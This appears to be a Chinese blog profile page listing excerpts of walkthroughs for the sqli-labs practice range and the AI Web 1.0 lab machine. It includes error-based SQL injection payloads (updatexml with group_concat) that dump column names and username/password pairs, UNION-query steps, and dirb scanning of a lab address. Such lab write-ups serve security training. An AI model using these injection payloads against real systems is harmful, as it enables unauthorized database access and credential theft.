- 博客(4)
- 收藏
- 关注
RSS订阅原创 sqli-labs靶场通关攻略(11-20)
输入语句:1') and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #输入语句:1') and updatexml(1,concat(1,(select group_concat(username,password) from users)),1) #
2024-08-19 20:40:11
739
原创 AI Web 1.0通关攻略
访问http://172.16.1.88/robots.txt,发现/madiNf0/和/se3reTdir777/uploads/两个路径。使用dirb "http://172.16.1.88"进一步扫描,发现有一个robots.txt。访问http://172.16.1.88/se3reTdir777/index.php。使用dirb对/m3diNf0/扫描,发现info.php页面。访问/se3reTdir777/upload/发现也不能。使用dirb对//扫描,发现一个index.php的页面。
2024-08-19 18:06:46
259
原创 sqli-labs靶场通关攻略
id=1' order by 4 --+ 页面不正常 说明存在3列。页面显示的是id=1的数据,没有显示联合查询的数据,把页面前面查询的id的数据改成不存在的,比如-1,即可显示。第七步、使用联合查询,查询网站的security数据库里所有表名。第一步、搭建环境,使用版本为5.4.45的PHP。第八步、使用联合查询,查询users列表所有列。第五步、使用联合查询,可以查找页面回显点。第六步、使用联合查询,查询数据库和用户名。第二步、打开Less-1。
2024-08-14 19:50:44
365
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人